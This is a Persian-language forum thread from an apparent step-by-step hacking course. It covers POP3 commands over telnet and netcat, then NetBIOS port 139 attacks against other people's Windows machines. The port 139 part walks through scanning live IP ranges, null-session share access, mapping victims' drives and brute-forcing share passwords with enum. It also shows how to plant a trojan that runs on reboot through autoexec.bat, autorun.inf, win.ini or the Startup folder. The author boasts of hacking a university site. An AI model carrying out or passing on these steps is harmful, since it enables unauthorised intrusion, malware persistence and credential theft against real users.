پورت۱۱۰ براي پروتکل POP3 استفاده مي‌شود. عبارت POP3 مخفف Post OfficeProtocol Version 3 است که اين پروتکل براي خواندن E-mail استفاده مي‌شود.براي کار با اين پروتکل بايد آدرس POP Server مربوط به E-mail خود رابدانيد. براي اين‌کار مي‌توان از nslookup استفاده کرد و سطري که عبارت MXدارد را خواند (قبلا چگونگي کار را گفتم و الان ديگه توضيح نمي‌دم). دقتکنيد که در مورد سايت‌هاي کوچک، آدرس POP Server همان آدرس SMTP Serverاست ولي در سايت‌هاي بزرگ (مثل ياهو‌ ) سرور‌هاي مربوطه جداست ( يعني دواسم مختلف دارد ). در مورد سايت ياهو POP Server در آدرسpop.mail.yahoo.com قرار دارد. ( من جديدا اين سرور رو تست نکردم، خودتونتست کنيد و مطمئن بشيد ). من امروز مي‌خوام از E-mail هاي سايت noavar.comاستفاده کنم که هم خيلي عاليه و هم ايرانيه! POP Server اين سايت در آدرسmail.noavar.com قرار دارد.


- با پورت ۱۱۰ صحبت کنيم

فرضکنيد که من در سرور mail.noavar.com يک اکانت به اسم araztest و پسوردmypass دارم. (شما هم اگه مي‌خواهيد تست کنيد، يک اکانت براي خودتون دراين سايت باز کنيد). حالا مي‌خوام با پورت ۱۱۰ صحبت کنم، بنابراين از يکياز دو دستور زير استفاده مي‌کنم:
telnet mail.noavar.com 110
nc -v mail.noavar.com 110
و جواب مي‌شنوم:
+OK POP3 server http://www.noavar.com ready
دقتکنيد که اگه از تلنت استفاده کنيد،چيزهايي که شما تايپ مي‌کنيد، ديدهنمي‌شود و نمي‌تونيد از دکمه ‌Backspace‌ استفاده کنيد. حالا مي‌خوام بگمکه اسم اکانت من araztest است، پس مي‌نويسم:
user araztest
و جواب مي‌شنوم:
+OK Please enter password for araztest
حالا مي‌خوام پسوردم رو بگم که اجازه صادر بشه! مي‌نويسم:
pass mypass
و جواب مي‌شنوم:
+OK password for user araztest Accepted
حالا مي‌خوام بدونم که جمعا چندتا mail رسيده است و حجم کل چقدر است. مي‌نويسم:
stat
و جواب مي‌شنوم:
+OK 2 25924
يعني براي من ۲ تا پيغام رسيده و حجم کل پيام‌هاي رسيده، ۲۵۹۲۴ بايت است. حالا مي‌خوام ليست پيام‌ها رو داشته باشم، مي‌نويسم:
list
و جواب مي‌شنوم:
+OK
1 70
2 24923
.
اينيعني پيغام شماره يک (پيغام جديدتر) حجم ۷۰ بايت دارد و پيغام شماره دوحجم ۲۴۹۲۳ بايت دارد. حالا مي‌خوام پيغام شماره ۱ را بخونم. مي‌نويسم:
retr 1
و جواب مي‌شنوم:
+OK 70 octets
Message-ID: <875808060@www.noavar.com>
From: "ali"
X-Mailer: Noavar
To: araztest@noavar.com
MIME-Version: 1.0
Subject: salam
Date: Thu, 13 Feb 2003 20:05:56

salam, chetori?
.
حالا مي‌خواهم اين پيغام ( شماره يک ) رو پاک کنم، مي‌نويسم:
dele 1
و جواب مي‌شنوم:
+OK Message 1 Marked for removal
[دقت کنيد که اين پيغام هنوز پاک نشده است و فقط علامت خورده که موقع خروج،پاک بشه. حالا ممکنه چندتا پيغام را مارک کنيد که حذف بشه ولي بعدبي‌خيال! مي‌شين. براي اينکه اين علامت‌ها را حذف کنيد که موقع خروج ديگهپاک نشوند، مي‌تونيد بنويسيد:
rset
و جواب مي‌شنوم:
+OK 1 70
]
حالا اگه بخواهم خارج بشم (و علامت‌خورده‌ها پاک بشن)، مي‌‌نويسم:
quit
و جواب مي‌شنوم:
+OK http://www.noavar.com signing off

uody
19th February 2011, 10:55 AM
قسمت 17ام هدیه ایست برای تو دوست خوبم
آموزش قدم به قدم هک قسمت 17
موضوع :پورت139
- NetBIOS چيست؟

NetBIOSمخفف عبارت Network Basic Input/Output System است. NetBIOS ابزاري است کهاجازه به اشتراک گذاشتن منابع رو به ما مي‌ده. ما برای به اشتراک گذاشتنفايل‌ها و يا پرينتر مي‌تونيم از اين پروتکل استفاده کنيم. نکته مهم ايناست که NetBIOS فقط در سيستم‌عامل ويندوز معني داره (اگرچه ابزارهايي مثلSamba در لينوکس مي‌تونن اونو شبيه سازي کنن ولي بحث ما خود پروتکلNetBIOS است). وقتي NetBIOS در ويندوز فعال باشد، بلافاصله سه تا پورتبراي استفاده باز مي‌شوند. پورت مهم و اصلي پورت ۱۳۹ در tcp است کهNetBIOS را هم با اين پورت مي‌شناسن. دو پورت ديگر، از نوع udp هستند وعبارتند از پورت ۱۳۷ براي name service و پورت ۱۳۹ براي Datagram service. وقتي قرار باشه که يک سيستم‌عامل ويندوز هک بشه ( خصوصا اگه کلاينت باشه) يکي از اولين مواردي که به ذهن مي‌رسه، استفاده از NetBIOS ه.
حالا ببينيم منظور از به اشتراک گذاشتن (Sharing) در مورد فايل‌ها و پرينتر‌ها چيست؟
بهاشتراک گذاشتن در مورد فايل‌ها يعني قرار دادن تعدادي فايل در يک کامپيوترخاص به طوريکه توسط ساير کامپيوترها قابل دسترسي و استفاده باشه. در موردپرينتر به اشتراک گذاشتن يعني طوري چاپگر متصل به يک کامپيوتر را تنظيمکنيم که توسط ساير کامپيوتر‌ها هم قابل استفاده باشه. با توجه به اينکه درسيستم‌عامل‌هاي ويندوز به صورت پيش‌فرض NetBIOS فعال است، پس مي‌توان بهتعدادي از فايل‌ها و فولدرهاي تعدادي از کامپيوترهاي روي شبکه دسترسي داشتو فايل‌ها را خواند و حتي کپي يا پاک کرد.


- چگونه با پورت ۱۳۹ صحبت کنيم؟

۱-اولين کاري که مي‌کنيم اين است که براي پورت ۱۳۹ پورت اسکن مي‌کنيم تا ipهايي را که پورت ۱۳۹ در آنها باز است، پيدا کنيم. من اين کار را با nmapانجام مي‌دم. فرض کنيد که يک ip به شماره 217.218.84.29 را تست کرده و بهنتيجه زير برسم:
Interesting ports on HOME-TU6U0AV86Y (217.218.84.29):
Port State Service
139/tcp open netbios-ssn
Remote operating system guess: Windows Millenn... (Me), Win 2000, or WinXP
اين خروجي اعلام مي‌کند که پورت ۱۳۹ باز است. پس مي‌شود از اين ip استفاده کرد.

۲-حالا مي‌خوام با اين پورت ارتباط برقرار کنم. اصولا بايد مثل سابق ازtelnet يا nc استفاده کنم ولي در مورد پورت ۱۳۹ روش ارتباطي فرق مي‌کند.کامنت پرامت را باز کرده و دستور زير را مي‌نويسم:
nbtstat -A 217.218.84.29
دستورnbtstat يک ابزار خاص براي کار با NetBIOS است. دقت کنيد که از پارامتر A-با ip مربوطه استفاده کردم. (دستور nbtstat داراي پارامتر‌هاي بسياري استکه اگه مي‌خواين همه رو ببينين، بنويسين nbtstat و enter را بزنيد.)
حالا بحث اينه که اين دستور چه‌ کاري مي‌کنه و خروجي به چه صورتي است:
ايندستور به ip مورد نظر وصل مي‌شه و از اون مي‌خواد ليست منابعي رو که بهاشتراک گذاشته رو ليست کنه. در اين حالت ۲ حالت ممکنه اتفاق بيوفته:
الف)مواجه با پيغام Host not found بشم. اين يعني اينکه نمي‌تونه ليست منابعرا از اون کامپيوتر بگيره (يعني NetBIOS غير فعاله). يعني اگرچه پورت ۱۳۹بازه ولي قابل استفاده نيست.
ب) ارتباط برقرار بشه و ليست منابع اشتراکي ليست بشه:
NetBIOS Remote Machine Name Table

Name Type Status
---------------------------------------------
HOME-TU6U0AV86Y<00> UNIQUE Registered
MSHOME <00> GROUP Registered
HOME-TU6U0AV86Y<20> UNIQUE Registered
MSHOME <1E> GROUP Registered

MAC Address = 00-53-45-00-00-00

۳-در اين نتايج چيزي که به درد مي‌خوره، سطري است که <20> دارد. اگه<20> نباشد، يعني نمي‌تونين از اشتراک گذاري فايل استفاده کنيد ( بهعبارت ساده تر بي‌خيال شو اين کامپيوتر رو ! ). در اين مثال ما اين سطر راداشتيم پس ادامه مي‌دهيم. حالا مي‌نويسم:
net view \\217.218.84.29
حالا اگه گفتين چي ميشه؟ درسته! دو حالت ممکنه اتفاق بيوفته:
الف) پيغام بياد
System error 5 has occurred.

Access is denied.

اين يعني نمي‌تونين ادامه بدين. به عبارت ديگه ايست! ولي يه کاريمي‌تونيد بکنيد و اون اينه که يه null session برقرار کنيد با اونکامپيوتر. اين حالت در مورد ويندوز‌هاي سري NT جواب ميده. مي‌نويسيد:
net use \\217.218.84.29\IPC$ "" /user:""
حالاچرا مي‌گن null session ؟ دليلش اينه که يک ارتباط برقرار کردم با اون ipبدون username و بدون password . حالا اگه اين دستور جواب داد مي‌تونمدوباره دستور net view \\217.218.84.29 را تکرار کنم.
ب) ممکنه دستور ذکر شده جواب بده و مثلا جواب بده:
Shared resources at \\217.218.84.29

Share name Type Used as Comment

------------------------------------------------
Printer Print Acrobat PDFWriter
Printer2 Print Acrobat Distiller
SharedDocs Disk
The command completed successfully.

عاليه. دقت کنيد که در اين کامپيوتر يک فايل (Disk) به اسم ShareDocs به اشتراک گذاشته شده (دو تاي باقي براي پرينتر است). حالا که رسيدم به اين اسم ديگه آخرين دستور را مي‌نويسم.

۴-حالا وقتشه که واقعا عمل به اشتراک گذاشتن رو انجام بديم. براي اينکاربايد يک درايو انتخاب کنيد. حتما مي‌دونيد که درايو چيه. وقتي شما MyComputer را دابل کليک کرده و باز مي‌کنيد، يک سري آيکون مي‌بينيد که هرکدام اسمي‌ دارند. مثلا :A براي فلاپي و و و تا مي‌رسيد به cdrom که آخرينحرف را دارد. مثلا فرض کنيد که :K باشه. حالا بايد اسم درايو رو براياشتراک گذاشتن انتخاب کنيد. براي اين‌کار حرف بعدي در زبان انگليسي رو بهکار ببريد. چون در کامپيوتر من :K آخرين بود، من حرف بعدي يعني :L راانتخاب مي‌کنم و دستور زير را مي‌نويسم:
net use L: \\217.218.84.29\SharedDocs
بهاسم درايو، ip و نام مربوطه که ShareDocs دقت کنيد. چون من اصطلاحا بهصورت null session دارم ارتباط مي‌گيرم، ممکنه کار نکنه ولي اگه درست کارکنه جواب مي‌شنوم:
The command completed successfully.
معرکهاست!!! حالا My Computer رو باز کنيد و ببينيد که درايو جديد به ليستدرايوها اضافه شده که مي‌تونين مثل درايوهاي معمولي با اون کار کنيد وفايل کپي کنيد و ...

۵- وقتي کار تموم شد مي‌تونيد درايو رو حذفکنيد. براي اينکار مي‌تونين روي درايو رايت‌کليک کنيد و Disconnect راانتخاب کنيد. و يا اينکه از دستور
net use /delete L:
استفاده کنيد.


- نکته نکته نکته

۱-يه روش جالب به جاي مرحله ۴ در بالا اينه که مثلا در مرورگر يا در runبنويسيد 217.218.84.29\\ که ip داراي اشتراک است و يا اينکه تايپ کنيدSharedDocsت\217.218.84.29\\ که اصولا بايد جواب بده ( ولي من خودم تستنکردم اينو ).
۲- من دارم به صورت استاندارد کار مي‌کنم. بعدا خواهم گفت که چطوري مي‌تونيم وقتي تو بعضي از مراحل متوقف مي‌شيم، اونو دور بزنيم.
۳- NetBIOS فقط براي کلاينت‌ها نيست. من خودم يکبار سايت دانشگاه رو با اون هک کردم. البته با exploit کردن که بعدا خواهم گفت.
۴- اگه داريد يک کلاينت رو هک مي‌کنيد، بايد سريع عمل کنيد تا قبل از اينکه طرف disconnect کنه کار شما تموم شده باشه.
۵-روش‌هاي ديگري هم براي کار با NetBIOS هست که يکي از اون روش‌ها استفادهاز يک سري نرم‌افزارهاي خاص است که تو درس بعدي توضيح مي‌دم و نيز يک روشديگه اعمال تغييرات در فايل‌هاي HOST و LMHOST و استفاده از find درسيستم‌عامل ويندوز است. ولي چون اين روش دنگ و فنگش زياده، جالب نيست.
۶-براي اينکه بتونيم با NetBIOS کار کنيم، علاوه بر اينکه در کامپيوتر طرفمقابل بايد فعال باشه، روي کامپيوتر خودمون هم فعال باشه. چون در حالتپيش‌فرض در کامپيوتر فعال است، معمولا مشکلي نيست.


- چگونه NetBIOS را روي کامپيوتر خودمان فعال يا غير فعال کنيم؟

براي غيرفعال کردن NetBIOS در ويندوز با توجه به نوع آن ويندوز روش‌هاي مختلفي هست. جدول پاييني براي همين موضوع طراحي شده است:

Win 2000 Win XP Home Win XP Professional
Start> Programs > Administrative Tools > Local Security Settings> Local Policies > Security Options > Additional restrictionsof anonymous connections > Local policy setting > "No accesswithout explicit anonymous permissions" > Ok Start > Programs > Administrative Tools > Local Security Settings > Local Policies >
1) Network Access: Do not allow anonymous enumeration of SAM accounts: Enabled
2) Network Access: Do not allow anonymous enumeration of SAM accounts and shares: Enabled
Start> Run > regedit > HKEY_LOCAL_MACHINE > HKEY_LOCAL_MACHINE> SYSTEM > CurrentControlSet > Control > LSA >RestrictAnonymous=2
مي‌تونيد به کمک فايروال يا روتر پورت‌هاي زير را ببنديد:
135 TCP DCE/RPC Portmapper
137 TCP/UDP NetBIOS Name Service
138 TCP/UDP NetBIOS Datagram Service
139 TCP NetBIOS Session Service
445 TCP Microsoft-DS (Windows 2000 CIFS/SMB)
۱-وقتي پورت ۱۳۹ رو مي‌بنديد، ديگه نمي‌تونيد از NetBIOS استفاده کنيد ( مگراينکه دوباره پورت رو به صورت فعال در‌ آوريد). پس وقتي که کسي رومي‌خواهيد هک کنيد، نياز داريد که براي مدت کوتاهي دوباره پورت رو فعالکنيد.

۲- مي‌بينيد که مثلا براي ويندوز ۲۰۰۰ به سه روش کار کنيد، در اين جدول فقط کافي است يکي رو اعمال کنيد.

۳-اگه بعد از غير فعال کردن، دوباره بخواهيد فعال کنيد، در مرحله آخر هر يکاز روش‌هاي بالا، گزينه‌اي که مخالف گزينه ذکر شده در جدول است رو انتخابکنيد، مثلا اگه در جدول Enabled را نوشته‌ايم، شما Disable را انتخاب کنيد.


- چگونه از اين امکانات به اشتراک گذاشتن، براي اجراي يک تروجان روي کامپيوتر قرباني استفاده کنيم؟

خوبما هنوز طريقه استفاده از تروجان رو ياد نگرفتيم ولي سعي مي‌کنم تو يکي ازدرس‌هاي آينده اونو توضيح بدم. ما اينجا مي‌خواهيم از تروجان در رابطه باپورت ۱۳۹ استفاده کنيم. حالا سوال اين است که تروجان (trojan) چيست؟
تروجانبه‌طور ساده برنامه‌اي اجرايي است، که ما براي طرف مقابل مي‌فرستيم و اگهطرف مقابل اونو اجرا کنه، ما مي‌تونيم کنترل سيستم‌ اونو به دست بياريم.تا اينجا کافي است فعلا ولي بعدا بيشتر توضيح مي‌دم.
حالا همان بحث تروجان ولي در رابطه با پورت ۱۳۹ :
روشکار به اين صورت است که فرضا من الان تونستم يک درايو رو از يک کامپيوتربا پورت باز Share کنم. حالا فايل تروجان ( سرور تروجان ) را uploadمي‌کنم به اون کامپيوتر و اسمي براش انتخاب مي‌کنم که طرف مقابل رو بهاجراي فايل تشويق کنه. يک اشتباهي که بعضي‌ها مي‌کنند اينه که بعد از کپيکردن تروجان در کامپيوتر هدف، خود هکر مي‌آد و فايل رو دابل کليک مي‌کنه،در اين حالت تروجان روي کامپيوتر خودمون (هکر) اجرا مي‌شه نه کامپيوترقرباني. پس ما فقط فايل رو مي‌فرستيم و منتظر مي‌مونيم که طرف مقابل اجراکنه.

حالا چند روش رو مطرح مي‌کنم که در شرايط خاص حالتي رو ايجاد مي‌کنه که نيازي با دابل‌کليک توسط قرباني نباشد:
۱-اگه به درايو C کامپيوتر مقابل دسترسي داريد، يک سطر به فايل autoexec.batاضافه کنيد که نام و مسير فايل اجرايي را در اون سطر بنويسيد. مثلا اگهاسم تروجان ali.exe باشد و در مسير d:\newfolder باشد، سطري که اضافهمي‌کنيم به صورت زير است:
d:\newfolder\ali.exe
در اين حالت به محض اولين restart کامپيوتر، تروجان اجرا خواهد شد.
۲-اگه به درايو C دسترسي داريد، مي‌تونيد فايلي به اسم Autorun.inf ايجادکنيد و دستورات زير را بنويسيد ( سطر آخر مطابق با همان تروجان فرضي که درمثال قبل گفتيم، نوشته شده است، اونو با توجه به اسم تروجان و مسير اونتغيير دهيد) :
[autorun]
open=d:\newfolder\ali.exe
۳-اگه به فولدر ويندوز دسترسي داريد، مي‌تونيد يک سطر مثل همان مثال قبل وليبراي فايل winstart.bat اجرا کنيد. در اين حالت هم به محض restart اجراخواهد شد.
۴- اگه به فولدر ويندوز دسترسي داريد، در فايل win.ini و بعد از قسمتي که [windows] نوشته، اين سطر رو اضافه کنيد:
run=d:\newfolder\ali.exe
۵-اگه به فولدر ويندوز دسترسي داريد، مي‌تونيد تروجان رو به فولدر StartMenu\Startup اضافه کنيد. در اين حالت نيازي به ويرايش هيچ فايل ديگرينيست.


- ابزارهاي کمکي: ۱- ابزارهاي خط فرماني


۱- enum :
اين برنامه را از اينجاداون‌لود کنيد. enum نرم‌افزاري با قابليت‌هاي فوق‌العاده است. از جملهتوانايي‌هايي که دارد، در مواردي است که کامپيوتر طرف مقابل براي اعمالsharing از ما پسورد بخواد. در اين موارد مي‌تونيم به کمک enum و ليستي ازپسوردهايي که در يک فايل ذخيره شده، تعداد زيادي پسورد رو چک کنيم (اصطلاحا cracking ) و شايد به نتيجه برسيم. ( اين موضوع را بعدا بيشترتوضيح مب‌دم) کاربردي که الان مد نظر ماست، پيدا کردن ليست share هايي استکه کامپيوتر مقابل براي ما باز گذاشته است. مثلا من دستور زير را تايپکردم، تا ليست اشتراک‌هاي آن ip خاص در آن لحظه رو بدست بيارم:
enum -S 217.218.84.29
و جواب شنيدم:
server: 217.218.84.29
setting up session... success.
enumerating shares (pass 1)... got 10 shares, 0 left:
E$ IPC$ D$ print$ SharedDocs F$ Printer2 ADMIN$ C$ Printer
cleaning up... success.
ملاحظهمي‌فرماييد که درايو‌هاي E و D و F و C و نيز SharedDocs و ... ليست شدهاست. بقيه مراحل مثل درس ۲۱ است. (دقت کنيد که در اين حالت نيازي به nullsession نيست ).

۲- nbtscan :
اين برنامه را از اينجاداون‌لود کنيد. اين برنامه دقيقا معادل nbtstat است ولي با اين تفاوت کهمي‌تونه تعداد زيادي ip رو همزمان تست کنه و ليست share ها رو بدست بياره.اين دقيقا راه‌حلي است براي سوالي که خيلي از شما دوستان پرسيده بودين.مثلا اگه بنويسم:
nbtscan -v -s : 195.219.49.0-30
که ليست اشتراک‌ها رو از ip شماره 195.219.49.0 تا 195.219.49.30 بدست مياره. جواب مي‌شنوم:
195.219.49.1 Recvfrom failed: Connection reset by peer
195.219.49.5 Recvfrom failed: Connection reset by peer
195.219.49.6 Recvfrom failed: Connection reset by peer
195.219.49.7 Recvfrom failed: Connection reset by peer
195.219.49.8 Recvfrom failed: Connection reset by peer
195.219.49.12 Recvfrom failed: Connection reset by peer
195.219.49.23:MRS.ZADE :00U
195.219.49.23:ATINET_MRA :00G
195.219.49.23:MRS.ZADE :03U
195.219.49.23:MAC:44-45-53-54-00-00
195.219.49.28:MAC:44-45-53-54-00-00
195.219.49.26:KIYARASH-R96L0K:00U
195.219.49.26:KIYARASH-R96L0K:20U
195.219.49.26:WORKGROUP :00G
195.219.49.26:WORKGROUP :1eG
195.219.49.26:MAC:00-53-45-00-00-00
195.219.49.22:FARHANG-ZCT780D:00U
195.219.49.22:FARHANG-ZCT780D:20U
195.219.49.22:WORKGROUP :00G
195.219.49.22:WORKGROUP :1eG
195.219.49.22:MAC:00-53-45-00-00-00
195.219.49.29:TESSA :00U
195.219.49.29:WORKGROUP :00G
195.219.49.29:TESSA :03U
195.219.49.29:MAC:44-45-53-54-00-00
195.219.49.25:MAC:44-45-53-54-00-00
در مورد ip هايي که 20U را مي‌بينيد، يعني sharing رو ميشه استفاده کرد.

۳- winfo :
اينم از جمله برنامه‌هايي است که بايد بگم آخر برنامه است!! از اينجاداون‌لود کنيد. البته توانايي تست تعداد زيادي ip رو نداره ولي وقتي يه ipرو تست مي‌کنه همه‌چي شو در رو مي‌کنه. (البته ميشه گفت همه اين کارها رومي‌شه با enum هم انجام داد ). مثلا من دستور زير را تايپ کردم :
winfo 195.219.49.184 -n -v
و به نتايج زير رسيدم:
Winfo 2.0 - copyright © 1999-2003, Arne Vidstrom
- http://www.ntsecurity.nu/toolbox/winfo/

Trying to establish null session...

Null session established.


SYSTEM INFORMATION:

- OS version: 4.0

DOMAIN INFORMATION:

- Primary domain (legacy): DSG
- Account domain: TEHRAN

Warning: Unable to retrieve domain DNS information.
Reason : Not supported by the remote OS.


PASSWORD POLICY:

- Time between end of logon time and forced logoff: No forced logoff
- Maximum password age: 42 days
- Minimum password age: 0 days
- Password history length: 0 passwords
- Minimum password length: 0 characters

LOCOUT POLICY:

- Lockout duration: 30 minutes
- Reset lockout counter after 30 minutes
- Lockout threshold: 0

SESSIONS:

- Computer: ARTAWILL-V0P1QR
- User:

LOGGED IN USERS:

* Administrator

USER ACCOUNTS:

* Administrator

- Password age: 666 days
- Privilege level: Administrator
- Home directory:
- Home directory mapped as:
- Comment: Built-in account for administering the computer/domain
- Account is: Enabled
- User can change password: Yes
- Account is locked out: No
- Password never expires: Yes
- The account is: Normal user
- Logon script path:
- Full name:
- User comment:
- Can log in from workstations: All
- Last logon to this DC / computer: Mon Mar 03 23:10:23 2003
- Last logoff from this DC / computer: Tue Dec 11 23:57:37 2001
- Account expires: Never
- Max disk space: Unlimited
- Failed logins in a row to this DC / computer: 0
- Path to user profile:
- Password has expired: No

(This account is the built-in administrator account)

* Guest

- Password age: 680 days
- Privilege level: Guest
- Home directory:
- Home directory mapped as:
- Comment: Built-in account for guest access to the computer/domain
- Account is: Disabled
- User can change password: No
- Account is locked out: No
- Password never expires: Yes
- The account is: Normal user
- Logon script path:
- Full name:
- User comment:
- Can log in from workstations: All
- Last logon to this DC / computer: None
- Last logon to this DC / computer: None
- Account expires: Never
- Max disk space: Unlimited
- Failed logins in a row to this DC / computer: 0
- Path to user profile:
- Password has expired: No

(This account is the built-in guest account)

* TEST

- Password age: 680 days
- Privilege level: User
- Home directory:
- Home directory mapped as:
- Comment:
- Account is: Enabled
- User can change password: Yes
- Account is locked out: No
- Password never expires: No
- The account is: Normal user
- Logon script path:
- Full name:
- User comment:
- Can log in from workstations: All
- Last logon to this DC / computer: None
- Last logon to this DC / computer: None
- Account expires: Never
- Max disk space: Unlimited
- Failed logins in a row to this DC / computer: 0
- Path to user profile:
- Password has expired: Yes

WORKSTATION TRUST ACCOUNTS:

INTERDOMAIN TRUST ACCOUNTS:

SERVER TRUST ACCOUNTS:

SHARES:

* ADMIN$

- Type: Special share reserved for IPC or administrative share
- Remark: Remote Admin

* IPC$

- Type: Unknown
- Remark: Remote IPC

* C$

- Type: Special share reserved for IPC or administrative share
- Remark: Default share
بعدا سعي خواهم کرد که در مورد تک تک اينها بحث کنم براتون. ولي به عنوان مثال در آخرها مي‌تونين، share ها رو ببينيد.

۴- NAT :
اين برنامه را از اينجاداون‌لود کنيد. يکي از مهم‌ترين کاربرد‌هاي اون crack کردن پسورد sharingاست ( مثل enum ). براي کار با NAT کافي است، بنويسيد nat و بعد يک فاصلهو بعد ip را مي‌نويسيم. حتما تست کنيد و نتيجه رو ببينيد... ( تکليف برايخودتون )

۵- و ...


- ابزارهاي کمکي: ۲- ابزارهاي گرافيکي

۱- netbrute :
اين برنامه را از اينجاداون‌لود کنيد. من از بين ابزارهاي گرافيکي اينو توصيه مي‌کنم اگرچه بهاندازه دو نرم‌افزار بعدي مشهور نيست. من نمي‌خوام روش کار با اينو توضيحبدم چون خيلي تابلو‌ ه! ضمنا اين نرم‌افزار داخل خودش يک پورت اسکنر همداره که خيلي به درد مي‌خوره. حتما حتما حتما داون‌لود کنيد اينو و اونقدرانگولکش کنيد که سر در بيارين ازش. قرار نيست که همي‌چي رو من بهتون بگم !!

۲- Legion :
اگهبگم مشهورترين نرم‌افزار اسکن کردن پورت‌ ۱۳۹ اين نرم‌افزاره، سخن گزافينيست!! خيلي‌ها کشته مرده اون هستن ولي من زياد ازش خوشم نمي‌آد. اما بايدقبول کرد که کارش واقعا عاليه!!! به هر حال اگه خواستين داول‌لود کنيد، اينجا رو کليک کنيد.

۳- DumpSec يا DumpACL :
اين هم خيلي معروفه. اگه خواستين مي‌تونين از اينجا داون‌لود کنيد.


- آيا چيز ديگه‌اي راجع به اين پورت مونده که بحث نشده باشد؟

بله!
۱-يه نرم‌افزاري هست به اسم pqwak که اين‌طوري که مي‌گن، اگه کامپيوتر مقابلويندوز ۹۸ باشه، مي‌تونه پسورد اونو سه سوت در بياره. ( اين برنامه ازنقطه ضعف ويندوز ۹۸ راجع به netbios استفاده مي‌کنه و اونو exploitمي‌کنه) چون من درسم راجع به هک کردن سرورهاست و نه کلاينت، پس نبايد زيادبه درد ما بخوره ( توجه کنيد که ويندوز ۹۸ تو کار کلاينت‌اش هم مونده، چهبرسه به اينکه سرور باشه! ). خودتون بگردين و اونو اگه مي‌خواين پيدا کنيد.
۲-ما بحث استفاده از نقاط ضعف پورت‌ها رو هنوز شروع نکرده‌ايم و در موردپورت ۱۳۹ هم همينطوره. به عنوان مثال روش‌هايي هست که پورت ۱۳۹ رو exploitکنيم و اون مراحلي که توش گير مي‌کرديم رو دور بزنيم.


- نکاتي راجع به enum

خوب قبلا گفتم که enum نرم‌افزار بسيار مهمي در ارتباط با پورت ۱۳۹ است. حالا مي‌خوام دو کاربرد خاص از اونو براتون توضيح بدم:

۱- گرفتن password policy information :
درويندوزهاي NT مي‌شود يک سري پارامتر رو براي پسوردها ست کرد. مثلا اينکهحداقل طول پسورد و حداکثر اون چقدر باشه و ... براي اينکه اين policy روبدست بياريد، از سويچ P استفاده مي‌کنيم. مثلا مي‌نويسيم:
enum -P xxx.xxx.xxx.xxx
و جواب مي‌شنوم:
server: xxx.xxx.xxx.xxx
setting up session... success.
password policy:
min length: none
min age: none
max age: 42 days
lockout threshold: none
lockout duration: 30 mins
lockout reset: 30 mins
cleaning up... success.
خودتون که دارين مي‌بينين!

۲- استفاده از روش cracking براي پيدا کردن پسورد:
اگهبا NetBIOS کار کرده باشيد، حتما ديديد که بعضي وقت‌ها (خصوصا در موردسرورها) پسورد از ما سوال ميشه. (پسورد وقتي پرسيده ميشه که بخواهيم،مرحله ۴ رو از بالا انجام بديم). وقتي پسورد نداشته باشيد، کاري نمي‌تونيدبکنيد. پس ما کاري که مي‌کنيم، اينه که يک سري پسورد را توسط enum تستمي‌کنيم که يکي جواب بده - يا اينکه نده !
اصولا تست کردن تعداد زياديپسورد براي پيدا کردن پسورد درست رو crack کردن پسورد به روش brute forceيا bf مي‌گن ( اين bf رو با اون bf اشتباه نگيريد!! ). البته استفاده ازروش bf مختص NetBIOS نيست و خيلي جاها استفاده ميشه. اينم بگم که استفادهاز روش bf يه کمي کلاس کار شما رو به عنوان هکر پايين مياره...
حالاچيري مي‌خوايم، يک فايل بزرگ از پسوردهايي است که معمولا مردم استفادهمي‌کنن. براي پيدا کردن اين فايل‌ها که اصطلاحا dictionary file ناميدهمي‌شوند به صورت زير است:
الف) استفاده از ديکشنري‌هاي آماده مثل The Argon که مشهورترين ديکشنري کرکينگ مي‌باشد با حجمي حدود ۲۴ مگابايت!
ب)بعضي وقت‌ها خودمون مي‌خواهيم يه ديکشنري بسازيم، در اين موارد کاري کهمي‌کنيم اينه که از نرم‌افزارهاي سازنده ديکشنري استفاده مي‌کنيم. مثلاوقتي که شما مي‌دونيد که فلاني از پسوردهاي ۸ حرفي استفاده مي‌کنه و ...براي اين‌کار نرم‌افزارهاي زيادي هست که چند نمونه مهمش عبارتند از: DCM 2.0 و DICTIONARY MAKER و PASSLIST.TXT GENERATOR و ...

حالاکه يه فايل ديکشنري دارم مي‌تونم کار کرک پسورد NetBIOS رو شروع کنم. فرضکنيد که وقتي مي‌خوام Ali رو در يک ip به شماره xxx.xxx.xxx.xxx رو با يکفايل ديکشنري به اسم theargon.lst کرک کنيم. دستوري که براي اين‌کاراستفاده مي‌کنيم، اينه:
enum -D -f "theargon.lst" -u "Ali" xxx.xxx.xxx.xxxحالا enum مياد و تمام پسوردها رو تست مي‌کنه تا ايشالله به جواب برسه!
اينقدرکه از enum تعريف کردم ديگه بسه! مشکلي که enum راجع به کرک پسورد دارهاينه که خيلي کند کار ميکنه. ممکنه ساعت‌ها وقت لازم باشه. راه‌حل چيه؟


- راه حل براي سرعت بخشيدن کرک کردن پسورد NetBIOS

راه‌حل اينه که اصلا از enum استفاده نکنيد. براي کرک پسورد NetBIOS سعي کنيد از نرم‌افزار SMB Auditing Toolاستفاده کنيد. در عرض چند دقيقه کار تموم ميشه! دليلش هم اينه که ايننرم‌افزار از يک bug استفاده مي‌کنه که اجازه ميده تعداد زيادي پسورد رودر يک لحظه تست کنيد. اينم بگم که اين نرم‌افزار مخصوص سيستم‌عامل لينوکسو يونيکسه.

uody
20th February 2011, 03:34 PM
واین هم قسمت 18ام

آموزش قدم به قدم هک قسمت 18
موضوع:samba
- Samba چيست؟

احتمالاميدونيد که Netbios پرتکل معروف مايکروسافت براي ارتباط ويندوز ها با هم واحتمالا Share کردن پرينتر يا فايله. همچنين وقتي که بحث نفوذ به Client وبر بعضي مواقع Server ها پيش مياد، Netbios يکي از اولين انتخاب هاست. مادر اين مقاله سعي ميکنيم از اين ضعف سيستم عاملهاي مايکروسافت سوءاستفادهکنيم.
سيستم عاملهاي بر پاييه يونيکس مثل لينوکس براي Share کردنفايلها و پرينتر ها از طريق Netbios از پرتکل Smb/Cifs که توسط برنامهSamba باز ميشه استفاده ميکنن و از اين طريق لينوکس ميتونه Share هايکامپيوتر هاي ويندوز رو Mount کنه. (اگه کاربر لينوکس هستيد، نمي‌تونيدروش‌هايي که در درس قبلي براي ويندوز ذکر شده استفاده کنيد، بلکه بايد ازSamba بهره گيريد. اما طرف مقابل که قرار است هک بشه، سيستم‌عاملش رو فرضمي‌کنيم که ويندوزه. پس ما مي‌خوايم با لينوکس يک سيستم‌عامل ويندوز را که۱۳۹ باز داره، هک کنيم) بي شک Netbios عمومي ترين مشکل امنيتي ويندوزه کهاستفاده ازش چندان مشکل نيست.
